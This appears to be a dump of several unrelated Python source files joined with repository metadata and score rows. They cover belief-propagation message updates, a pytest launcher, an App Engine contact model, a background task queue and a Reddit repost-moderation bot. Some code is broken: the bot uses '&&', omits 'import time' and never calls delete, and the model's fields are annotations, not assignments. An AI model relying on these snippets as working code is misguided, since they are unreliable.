self._set_counting_numbers(default_counting_numbers)
def _set_counting_numbers(self, counting_numbers):
"""
Store the provided counting numbers and set up the associated vectors for the ordered variable representation.
:param counting_numbers: a dictionary with an entry for each variable and edge with counting number values
:type counting_numbers: dict
:return: None
"""
self.edge_counting_numbers = np.zeros(2 * self.mn.num_edges)
for edge, i in self.mn.message_index.items():
reversed_edge = edge[::-1]
if edge in counting_numbers:
self.edge_counting_numbers[i] = counting_numbers[edge]
self.edge_counting_numbers[i + self.mn.num_edges] = counting_numbers[edge]
elif reversed_edge in counting_numbers:
self.edge_counting_numbers[i] = counting_numbers[reversed_edge]
self.edge_counting_numbers[i + self.mn.num_edges] = counting_numbers[reversed_edge]
else:
raise KeyError('Edge %s was not assigned a counting number.' % repr(edge))
self.unary_counting_numbers = np.zeros((len(self.mn.variables), 1))
for var, i in self.mn.var_index.items():
self.unary_counting_numbers[i] = counting_numbers[var]
self.unary_coefficients = self.unary_counting_numbers.copy()
for edge, i in self.mn.message_index.items():
self.unary_coefficients[self.mn.var_index[edge[0]]] += self.edge_counting_numbers[i]
self.unary_coefficients[self.mn.var_index[edge[1]]] += self.edge_counting_numbers[i]
def compute_bethe_entropy(self):
if self.fully_conditioned:
entropy = 0
else:
entropy = - np.sum(self.edge_counting_numbers[:self.mn.num_edges] *
(np.nan_to_num(self.pair_belief_tensor) * np.exp(self.pair_belief_tensor))) \
- np.sum(self.unary_counting_numbers.T *
(np.nan_to_num(self.belief_mat) * np.exp(self.belief_mat)))
return entropy
def update_messages(self):
self.compute_beliefs()
adjusted_message_prod = self.mn.edge_pot_tensor - np.hstack((self.message_mat[:, self.mn.num_edges:],
self.message_mat[:, :self.mn.num_edges]))
adjusted_message_prod /= self.edge_counting_numbers
adjusted_message_prod += self.belief_mat[:, self.mn.message_from]
messages = np.squeeze(logsumexp(adjusted_message_prod, 1)) * self.edge_counting_numbers
messages = np.nan_to_num(messages - messages.max(0))
change = np.sum(np.abs(messages - self.message_mat))
self.message_mat = messages
return change
def compute_beliefs(self):
if not self.fully_conditioned:
self.belief_mat = self.mn.unary_mat + self.augmented_mat
self.belief_mat += sparse_dot(self.message_mat, self.mn.message_to_map)
self.belief_mat /= self.unary_coefficients.T
log_z = logsumexp(self.belief_mat, 0)
self.belief_mat = self.belief_mat - log_z
def compute_pairwise_beliefs(self):
if not self.fully_conditioned:
adjusted_message_prod = self.belief_mat[:, self.mn.message_from] \
- np.nan_to_num(np.hstack((self.message_mat[:, self.mn.num_edges:],
self.message_mat[:, :self.mn.num_edges])) /
self.edge_counting_numbers)
to_messages = adjusted_message_prod[:, :self.mn.num_edges].reshape(
(self.mn.max_states, 1, self.mn.num_edges))
from_messages = adjusted_message_prod[:, self.mn.num_edges:].reshape(
(1, self.mn.max_states, self.mn.num_edges))
beliefs = self.mn.edge_pot_tensor[:, :, self.mn.num_edges:] / \
self.edge_counting_numbers[self.mn.num_edges:] + to_messages + from_messages
beliefs -= logsumexp(beliefs, (0, 1))
self.pair_belief_tensor = beliefs
| 2.875
| 3
|
sshpipe/sshpipe/lib/subprocess/__init__.py
|
Acrisel/sshpipe
| 0
|
12780146
|
<filename>sshpipe/sshpipe/lib/subprocess/__init__.py
from .sshsubprocess import run
| 1.242188
| 1
|
command_line/pytest_launcher.py
|
dials/dx2
| 0
|
12780147
|
<filename>command_line/pytest_launcher.py
# LIBTBX_SET_DISPATCHER_NAME pytest
import sys
import pytest
# modify sys.argv so the command line help shows the right executable name
sys.argv[0] = "pytest"
sys.exit(pytest.main())
| 1.570313
| 2
|
client/gap/contact.py
|
brandsafric/weqtrading
| 1
|
12780148
|
<gh_stars>1-10
import os
import webapp2
import jinja2
from google.appengine.ext import ndb
from google.appengine.api import users
import logging
import json
class Contact(ndb.Expando):
contact_id : ndb.StringProperty()
names : ndb.StringProperty()
cell : ndb.StringProperty()
email : ndb.StringProperty()
subject : ndb.StringProperty()
message : ndb.StringProperty()
| 1.8125
| 2
|
backgroundtasks.py
|
chadspratt/AveryDB
| 0
|
12780149
|
<reponame>chadspratt/AveryDB<filename>backgroundtasks.py<gh_stars>0
"""Code to handle queuing and execution of background tasks."""
##
# Copyright 2013 <NAME>
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
import table
import sqlite3
class BackgroundTasks(object):
def queuetask(self, task=None):
"""Add a task to the process queue but don't start processing."""
if task:
self.tasks_to_process.append(task)
def processtasks(self, task=None):
"""Process all the queued "background" tasks, like converting files."""
if task:
self.tasks_to_process.append(task)
if not self.taskinprogress:
self.taskinprogress = True
while self.tasks_to_process:
tasktype, taskdata = self.tasks_to_process.pop(0)
if tasktype == 'index':
self.buildindex(taskdata)
self.updatesample('refresh sample')
elif tasktype == 'sample':
# a needed sql table might not be created yet
try:
self.updatesample(taskdata)
# if it fails, add it back to the end of the task list
except sqlite3.OperationalError:
self.tasks_to_process.append((tasktype, taskdata))
elif tasktype == 'sqlite':
filealias, dataconverter = taskdata
self.converttosql(filealias, dataconverter)
elif tasktype == 'lengthadjust':
self.adjustfieldlengths(taskdata)
# This has to go after conversion is done.
if self.executejoinqueued:
self.gui['executejointoggle'].set_active(False)
self.executejoin(None)
self.taskinprogress = False
def buildindex(self, join):
"""Build index in the background"""
indexalias = join.joinalias
indexfield = join.joinfield
self.files[indexalias].buildindex(indexfield)
def converttosql(self, filealias, dataconverter):
"""Convert a file to an SQLite table."""
progresstext = 'Converting to sqlite: ' + filealias
self.gui.setprogress(0, progresstext)
# Run the generator until it's finished. It yields % progress.
try:
for progress in dataconverter:
# this progress update lets the GUI function
self.gui.setprogress(progress, progresstext, lockgui=False)
except table.FileClosedError:
print 'File removed, aborting conversion.'
self.gui.setprogress(0, '')
def adjustfieldlengths(self, lengthdetectgen):
"""Run the generator that finds and sets min field lengths."""
progresstext = 'Adjusting field lengths'
self.gui.setprogress(0, progresstext)
# Run the generator until it's finished. It yields % progress.
for progress in lengthdetectgen:
# this progress update lets the GUI function
self.gui.setprogress(progress, progresstext, lockgui=False)
self.gui.setprogress(0, '')
| 2.75
| 3
|
bot.py
|
kevinchu-sg/reddit-csv-bot
| 2
|
12780150
|
<reponame>kevinchu-sg/reddit-csv-bot
#!/usr/bin/env python3
import praw
import csv
from datetime import datetime, timedelta
#-------------------------------------------------
#OPTIONS
USERNAME = ''
PASSWORD = ''
user_agent = 'management by /u/kevinosaurus' #user-agent details
csv_list = ['log1.csv', 'log2.csv'] #log1 corresponds to subreddit 1's data, etc.
sr_list = ['all', 'letschat'] #sr stands for subreddit
limit = 25 #get 25 latest/newest posts from subreddit
POST_LIMIT = 10
TIMER = 60 #seconds
COMMENTS = '''
You have posted similar links too frequently. Please try again later.
I am a bot. Message /u/kevinosaurus for more help!
'''
MOD_TITLE = 'bot report' # you can use the %(old_c)s etc variables in the title too!
MOD_MSG = '''
Bot report
----------
Old thread: %(old_t)s
New thread: %(new_t)s
Old thread creator: %(old_c)s
New thread creator: %(new_c)s
''' # %(old_t)s and such are the variables. You can change the messages and retain the variables.
#-------------------------------------------------
def main():
r = praw.Reddit(user_agent=user_agent)
r.login(USERNAME, PASSWORD, disable_warning=True)
for sr in sr_list:
subreddit = r.get_subreddit(sr)
with open(csv_list[sr_list.index(sr)], 'r+') as file:
fieldnames = ['key', 'username', 'datetime', 'location']
reader = csv.DictReader(file)
writer = csv.DictWriter(file, fieldnames=fieldnames)
newFile = []
for thread in subreddit.get_new(limit=limit):
if thread.url != thread.permalink:
t_key = thread.url
t_user = thread.author
t_date = datetime.fromtimestamp(thread.created)
t_loc = thread.permalink
for row in reader:
if row['key'] == t_key:
t_exist = True
t_csv_key = row['key']
t_csv_date = row['datetime']
t_csv_user = row['username']
else:
t_exist = False
if t_exist:
if (datetime.fromtimestamp(t_csv_date) + timedelta(days=POST_LIMIT)) < datetime.now():
thread.add_comment(COMMENTS)
thread.delete
else:
for row2 in reader:
if t_key not in newFile && t_key != row['key']:
newFile.append(row2)
writer.writerows(newFile)
writer.writerow({'key': t_key, 'username': t_user, 'datetime': t_date, 'location': t_loc})
if t_csv_user != t_user:
MOD_TITLE = MOD_TITLE % {'old_t': t_csv_key, 'new_t': t_key, 'old_c': t_csv_user, 'new_c': t_user}
MOD_MSG = MOD_MSG % {'old_t': t_csv_key, 'new_t': t_key, 'old_c': t_csv_user, 'new_c': t_user}
r.send_message('/r/'+sr, MOD_TITLE, MOD_MSG)
else:
writer.writerow({'key': t_key, 'username': t_user, 'datetime': t_date, 'location': t_loc})
while True:
main()
time.sleep(TIMER)
| 2.484375
| 2
|